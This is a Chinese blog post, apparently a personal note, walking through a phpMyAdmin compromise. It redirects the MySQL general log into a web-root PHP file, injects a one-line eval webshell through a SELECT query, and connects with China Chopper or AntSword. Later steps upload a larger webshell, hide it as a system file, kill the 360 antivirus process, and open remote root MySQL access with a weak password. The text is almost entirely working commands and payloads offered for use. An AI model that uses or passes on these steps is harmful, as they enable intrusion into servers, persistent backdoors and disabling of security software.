phpMyadmin利用日志提权--本地
1.
nmap扫描局域网中开放的特定端口
nmap -sS -p 80 192.168.1.0/24
//半开放式扫描 192.168.1.0/24网段中开放80端口的
2.
进入phpmyadmin数据库后
在localhost下找到变量按钮
包含文字处输入general log
3.
设置general log 和 general log file
general log 为 ON
general log file 为 C:\phpStudy\PHPTutorial\WWW\shell.php
4.(一些命令查看路径等)
show variables like "%plugin%";
show VARIABLES LIKE "%general%";
set GLOBAL general_log = 'on';
set global general_log_file = 'C:\\phpStudy\\PHPTutorial\\WWW\\phpMyadmin\\udf.php';
![](https://upload-images.jianshu.io/upload_images/2356272-5aa5b67f4e153632.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后选择数据库旁边的SQL按钮
在SQL查询中输入查询一句话木马语句
select "<?php @eval($_POST[cmd]);?>"
点击执行
然后测试是否插入成功
浏览器输入
运行后页面显示一些日志数据,则植入成功
用菜刀或者蚁剑连接
连接后先上传大马
隐藏木马
命令行输入attrib +H +S muma.php
attrib 修改文件属性 +设置属性 H隐藏文件属性 S系统文件属性
/*下面的没成功,结束不了360进程*/
或者先在终端杀掉360进程(创建用户会被360拦截)
然后创建用户远程控制
cmd杀掉进程操作
Taskkill /pid [进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
方法一、
先找到进程名称,然后杀掉
tasklist //显示进程
tasklist /f /t /im 360Tray.exe //杀掉360进程
方法二、
先找到进程id,然后杀掉
tasklist //显示进程
tskill pid //杀掉进程id为pid的
taskkill /?
描述:
这个命令行工具可用来结束至少一个进程。可以根据进程 id 或图像名来结束进程。
参数列表:
/S system 指定要连接到的远程系统。
/U [domain\]user 指定应该在哪个用户上下文执行这个命令。
/P [password] 为提供的用户上下文指定密码。如果忽略,提示输入。
/F 指定要强行终止进程。
/FI filter 指定筛选进或筛选出查询的的任务。
/PID process id 指定要终止的进程的PID。
/IM image name 指定要终止的进程的图像名。通配符 '*'可用来指定所有图像名。
/T Tree kill: 终止指定的进程和任何由此启动的子进程。
/? 显示帮助/用法。
打开MySQL远程连接的命令以及含义
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
(grant all privileges on 库名.表名 to '用户名'@'IP地址' identified by '密码' with grant option;)
![](https://upload-images.jianshu.io/upload_images/2356272-1434016431f3d097.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步